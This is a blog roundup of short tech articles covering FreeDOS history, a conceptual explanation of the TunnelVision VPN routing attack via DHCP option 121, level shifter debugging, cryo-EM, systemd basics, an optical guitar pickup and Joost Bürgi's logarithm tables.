Nearly 30 Years Of FreeDOS And Looking Ahead To The Future

Blinky, the friendly FreeDOS mascot.
Blinky, the friendly FreeDOS mascot.

The first version of FreeDOS was released on September 16 of 1994, following Microsoft’s decision to cease development on MS-DOS in favor of Windows. This version 0.01 was still an Alpha release, with 0.1 from 1998 the first Beta and the first stable release (1.0, released on September 3 2006) still a while off. Even so, its main developer [Jim Hall] and the like-minded developers on the FreeDOS team managed to put together a very functional DOS using a shell, kernel and other elements which already partially existed before the FreeDOS (initially PD-DOS, for Public Domain DOS) idea was pitched by [Jim].

Nearly thirty years later, [Jim] reflects on these decades, and the strong uptake of what to many today would seem to be just a version of an antiquated OS. When it comes to embedded and industrial applications, of course, a simple DOS is all you want and need, not to mention for a utility you boot from a USB stick. Within the retro computing community FreeDOS has proven to be a boon as well, allowing for old PCs to use a modern DOS rather than being stuck on a version of MS-DOS from the early 90s.

For FreeDOS’ future, [Jim] is excited to see what other applications people may find for this OS, including as a teaching tool on account of how uncomplicated FreeDOS is. In a world of complicated OSes that no single mortal can comprehend any more, FreeDOS is really quite a breath of fresh air.

This Week In Security: TunnelVision, Scarecrows, And Poutine

There’s a clever “new” attack against VPNs, called TunnelVision, done by researchers at Leviathan Security. To explain why we put “new” in quotation marks, I’ll just share my note-to-self on this one written before reading the write-up: “Doesn’t using a more specific DHCP route do this already?” And indeed, that’s the secret here: in routing, the more specific route wins. I could not have told you that DHCP option 121 is used to set extra static routes, so that part was new to me. So let’s break this down a bit, for those that haven’t spent the last 20 years thinking about DHCP, networking, and VPNs.

So up first, a route is a collection of values that instruct your computer how to reach a given IP address, and the set of routes on a computer is the routing table. On one of my machines, the (slightly simplified) routing table looks like:

# ip route
default via 10.0.1.1 dev eth0
10.0.1.0/24 dev eth0

The first line there is the default route, where “default” is a short-hand for 0.0.0.0/0. That indicate a network using the Classless Inter-Domain Routing (CIDR) notation. When the Internet was first developed, it was segmented into networks using network classes A, B, and C. The problem there was that the world was limited to just over 2.1 million networks on the Internet, which has since proven to be not nearly enough. CIDR came along, eliminated the classes, and gave us subnets instead.

In CIDR notation, the value after the slash is commonly called the netmask, and indicates the number of bits that are dedicated to the network identifier, and how many bits are dedicated to the address on the network. Put more simply, the bigger the number after the slash, the fewer usable IP addresses on the network. In the context of a route, the IP address here is going to refer to a network identifier, and the whole CIDR string identifies that network and its size.

Back to my routing table, the two routes are a bit different. The first one uses the “via” term to indicate we use a gateway to reach the indicated network. That doesn’t make any sense on its own, as the 10.0.1.1 address is on the 0.0.0.0/0 network. The second route saves the day, indicating that the 10.0.1.0/24 network is directly reachable out the eth0 device. This works because the more specific route — the one with the bigger netmask value, takes precedence.

The next piece to understand is DHCP, the Dynamic Host Configuration Protocol. That’s the way most machines get an IP address from the local network. DHCP not only assigns IP addresses, but it also sets additional information via numeric options. Option 1 is the subnet mask, option 6 advertises DNS servers, and option 3 sets the local router IP. That router is then generally used to construct the default route on the connecting machine — 0.0.0.0/0 via router_IP.

Remember the problem with the gateway IP address belonging to the default network? There’s a similar issue with VPNs. If you want all traffic to flow over the VPN device, tun0, how does the VPN traffic get routed across the Internet to the VPN server? And how does the VPN deal with the existence of the default route set by DHCP? By leaving those routes in place, and adding more specific routes. That’s usually 0.0.0.0/1 and 128.0.0.0/1, neatly slicing the entire Internet into two networks, and routing both through the VPN. These routes are more specific than the default route, but leave the router-provided routes in place to keep the VPN itself online.

And now enter TunnelVision. The key here is DHCP option 121, which sets additional CIDR notation routes. The very same trick a VPN uses to override the network’s default route can be used against it. Yep, DHCP can simply inform a client that networks 0.0.0.0/2, 64.0.0.0/2, 128.0.0.0/2, and 192.0.0.0/2 are routed through malicious_IP. You’d see it if you actually checked your routing table, but how often does anybody do that, when not working a problem?

There is a CVE assigned, CVE-2024-3661, but there’s an interesting question raised: Is this a vulnerability, and in which component? And what’s the right solution? To the first question, everything is basically working the way it is supposed to. The flaw is that some VPNs make the assumption that a /1 route is a bulletproof way to override the default route. The solution is a bit trickier. Continue reading “This Week In Security: TunnelVision, Scarecrows, And Poutine”

Logic analyzer capture, showing the rails constantly oscillating at a high rate

When Your Level Shifter Is Too Smart To Function

By now, 3.3V has become a comfortable and common logic level for basically anything you might be hacking. However, sometimes, you still need to interface your GPIOs with devices that are 5 V, 1.8 V, or something even less common like 2.5 V. At this point, you might stumble upon autosensing level shifters, like the TXB010x series Texas Instruments produces, and decide that they’re perfect — no need to worry about pin direction or bother with pullups. Just wire up your GPIOs and the two voltage rails you’re good to go. [Joshua0] warns us, however, that not everything is hunky dory in the automagic shifting world.

During board bring-up and multimeter probing, he found that the 1.8 V-shifted RESET signal went down to 1.0V — and its 3.3 V counterpart stayed at 2.6V. Was it a current fight between GPIOs? A faulty connection? Voltage rail instability? It got more confusing as the debugging session uncovered the shifting operating normally as soon as the test points involved were probed with the multimeter in a certain order. After re-reading the datasheet and spotting a note about reflection sensitivity, [Joshua0] realized he should try and probe the signals with a high-speed logic analyzer instead.

Continue reading “When Your Level Shifter Is Too Smart To Function”

Cryo-EM: Freezing Time To Take Snapshots Of Myosin And Other Molecular Systems

Using technologies like electron microscopy (EM) it is possible to capture molecular mechanisms in great detail, but not when these mechanisms are currently moving. The field of cryomicroscopy circumvents this limitation by freezing said mechanism in place using cryogenic fluids. Although initially X-ray crystallography was commonly used, the much more versatile EM is now the standard approach in the form of cryo-EM, with recent advances giving us unprecedented looks at the mechanisms that quite literally make our bodies move.

Myosin-5 working stroke and walking on F-actin. (Credit: Klebl et al., 2024)
Myosin-5 working stroke and walking on F-actin. (Credit: Klebl et al., 2024)

The past years has seen many refinements in cryo-EM, with previously quite manual approaches shifting to microfluidics to increase the time resolution at which a molecular process could be frozen, enabling researchers to for example see the myosin motor proteins go through their motions one step at a time. Research articles on this were published previously, such as by [Ahmet Mentes] and colleagues in 2018 on myosin force sensing to adjust to dynamic loads. More recently, [David P. Klebl] and colleagues published a research article this year on the myosin-5 powerstroke through ATP hydrolysis, using a modified (slower) version of myosin-5. Even so, the freezing has to be done with millisecond accuracy to capture the myosin in the act of priming (pre-powerstroke).

The most amazing thing about cryo-EM is that it allows us to examine processes that used to be the subject of theory and speculation as we had no means to observe the motion and components involved directly. The more we can increase the time resolution on cryo-EM, the more details we can glimpse, whether it’s the functioning of myosins in muscle tissue or inside cells, the folding of proteins, or determining the proteins involved in a range of diseases, such as the role of TDP-43 in amytrophic lateral sclerosis (ALS) in a 2021 study by [Diana Arseni] and colleagues.

As our methods of freezing these biomolecular moments in time improve, so too will our ability to validate theory with observations. Some of these methods combine cryogenic freezing with laser pulses to alternately freeze and resume processes, allowing processes to be recorded in minute detail in sub-millisecond resolution. One big issue that remains yet is that although some of these researchers have even open sourced their cryo-EM methods, commercial vendors have not yet picked up this technology, limiting its reach as researchers have to cobble something together themselves.

Hopefully before long (time-resolved) cryo-EM will be as common as EM is today, to the point where even a hobby laboratory may have one lounging around.

Linux Fu: Getting Started With Systemd

I will confess. I started writing this post about some stupid systemd tricks. However, I wanted to explain a little about systemd first, and that wound up being longer than the tricks. So this Linux Fu will be some very fundamental systemd information. The next one will have some examples, including how to automount a Raspberry Pi Pico. Of course, by the end of this post, you’ll have only scratched the surface of systemd, but I did want to give you some context for reading through the rest of it.

Like many long-time Unix users, I’m not a big fan of systemd. Then again, I’m also waiting for the whole “windows, icon, mouse, pointer” fad to die down. Like it or not, systemd is here and probably here to stay for the foreseeable future. I don’t want to get into a flame war over systemd. Love it or hate it, it is a fact of life. I will say that it does have some interesting features. I will also say that the documentation has gotten better over time. But I will also say that it made many changes that perhaps didn’t need to be made and made some simple things more complicated than they needed to be.

In the old days, we used “init scripts,” and you can still do so if you are really motivated. They weren’t well documented either, but it was pretty easy to puzzle out the shell scripts that would run, and we all know how to write shell scripts. The systemd way is to use services that are not defined by shell scripts. However, systemd tries to do lots of other things, too. It can replace cron and run things periodically. It can replace inetd, syslog, and many other traditional services. This is a benefit or a drawback, depending on your point of view.

(Editor’s note: And this logging functionality was exactly what was abused in last week’s insane liblzma / ssh backdoor.)

Configuring systemd requires you to create files in one of several locations. In systemd lingo, they are “units.” For the purpose of this Linux Fu, we’ll look at only a few kinds of units: services, mounts, and timers. Services let you run programs in response to something like system start-up. You can require that certain other services are already running or are not running and many other options. If the service dies, you can ask systemd to automatically restart it, or not. Timers can trigger a service at a particular time, much like cron does. Another unit you’ll run into are sockets that represent — you guessed it — a network socket.

Continue reading “Linux Fu: Getting Started With Systemd”

Optical Guitar Pickup Works With Nylon Strings

Electric guitar pickups rely on steel strings interfering with a magnetic field, the changes in which are picked up with coils of wire. That doesn’t work with nylon strings, because they don’t tend to perturb magnetic fields nearly as much, beyond some infinitesimal level that some quantum physicist could explain. So what do you do? You follow [Simon]’s example, and build an optical pickup instead.

The concept is simple. You place an LED and a phototransistor in a U-shaped channel, and place it so that the string runs through it. You repeat this for each string. Thus, as a string vibrates, it interrupts the light travelling from the LED to the phototransistor. This generates a voltage that varies with the frequency of the string’s vibration. Funnily enough, this type of pickup will work just fine on both nylon and steel strings, if you were so inclined to try it.

[Simon] designed a nifty PCB with six LED-phototransistor pairs (using off-the-shelf interruptor sensors) for use with a nylon-stringed guitar. He reports that sound from the strings comes through clearly, but that there is some noise that is evident in the pickup’s output, too. Listening to the demo, it seems to capture the sound of the nylon strings well, it’s just a shame that the noise floor is so high.

If you prefer your guitar pickups to be the regular magnetic kind, you can always wind your own from scrap. Demo after the break.

Continue reading “Optical Guitar Pickup Works With Nylon Strings”

Joost Bürgi And Logarithms

Logarithms are a common idea today, even though we don’t use them as often as we used to. After all, one of the major uses of logarithms is to simplify computations, and computers do that just fine (although they might use logs internally). But 400 years ago, doing math was painful. Enter Joost Bürgi. According to [Welch Labs], his book of mathematical tables should have changed math forever. But it didn’t.

If you know how a slide rule works, you’ll find you already know much of what the video shows. The clockmaker was one of the people who worked out how logs could simplify many difficult equations. He created a table of 23,030 “red and black” numbers to nine digits. Essentially, this was a table of logarithms to a very unusual base: 1.0001.

Why such a strange base? Because it allowed interpolation to a higher accuracy than using a larger base. Red numbers are, of course, the logarithms, and the black numbers are antilogs. The real tables are a bit hard to read because he omitted digits that didn’t change and scaled parts of it by ten (which was changed in the video below to simplify things). It doesn’t help, either, that decimal points hadn’t been invented yet.

What was really impressive, though, was the disk-like construct on the cover of the book. Although it wasn’t mentioned in the text, it is clear this was meant to allow you to build a circular slide rule, which [Welch Labs] does and demonstrates in the video.

Unfortunately, the book was not widely known and Napier gets the credit for inventing and popularizing logarithms. Napier published in 1614 while Joost published in 1620. However, both men likely had their tables in some form much earlier. However, Kepler knew of the Bürgi tables as early as 1610 and was dismayed that they were not published.

While we enjoy all kinds of retrocomputers, the slide rule may be the original. Want to make your own circular version? You don’t need to find a copy of this book.

Continue reading “Joost Bürgi And Logarithms”